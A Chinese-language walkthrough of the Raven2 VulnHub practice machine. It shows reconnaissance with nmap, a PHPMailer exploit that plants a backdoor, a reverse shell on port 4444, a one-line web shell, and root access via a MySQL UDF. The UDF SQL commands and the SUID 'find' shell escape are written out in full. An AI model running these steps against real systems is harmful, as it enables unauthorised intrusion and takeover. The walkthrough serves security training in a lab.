Raven2 靶场

环境准备：

攻击机：

​ Kali2021系统 IP：192.168.226.131

​ Win10系统IP：192.168.226.136

靶场下载地址：

百度网盘链接：https://pan.baidu.com/s/1vbtCDRKse-AZ-VUhoSkbvA 提取码：60zo

​ 或者

vulnhub下载：https://www.vulnhub.com/entry/raven-2,269/

---

具体步骤：

先进行主机探测

​ nmap -sP 192.168.226.1/24

得到靶场IP为192.168.226.132

再对该IP进行端口扫描

​ nmap -A 192.168.226.132

发现22、80、111端口开放

浏览器访问80端口

使用dirsearch进行目录扫描

访问扫出来的目录

其中vendor目录存在目录遍历

VERSION中有个版本号

PATH文件显示了绝对路径

通过changelog.md中得到的信息可以推断前面的版本号为PHPMailer的版本号

使用Kali中的searchsploit来查询此web应用的漏洞

searchsploit PHPMailer

这里我们选择使用40974.py，查询下路径

将其copy出来

修改下EXP

其中target为 http://靶机IP/contact.php

backdoor为 生成的后门文件的名字，自定义

payload中的IP改为攻击机的IP

fields中-X后面改成刚才获取到的绝对路径/后门文件

修改完后，运行此EXP

运行完后访问 http://靶机IP/contact.php

这时就会产生后门文件，NC监听下端口4444

访问后门文件后，成功监听到，权限为低权限

由于觉得监听界面不太友好，我就写了个一句话进去

使用蚁剑连接一句话

因为他是存在有WordPress的，所以看下WordPress的配置文件

获取到MySQL得到账号密码 root/R@v3nSecurity

查询下MySQL运行权限

为root权限

连接下数据库，查询数据库版本

MySQL版本为5.5.60

进行udf提权

使用 select @@plugin_dir 查看当前数据库扩展插件存放的位置

udf提权所需的扩展，通过searchsploit User-Defined Func查找

此处选用1518.c，查询其路径，copy出来

进行编译，生成 .so文件，上传至/tmp

加载扩展，进行提权

use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/mysql.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/mysql.so';
create function do_system returns integer soname 'mysql.so';
select * from mysql.func;
select do_system('chmod u+s /usr/bin/find');

完成后执行

touch finn

find finn -exec "/bin/sh" /;

权限为root，提权完成

也可以上传个msf马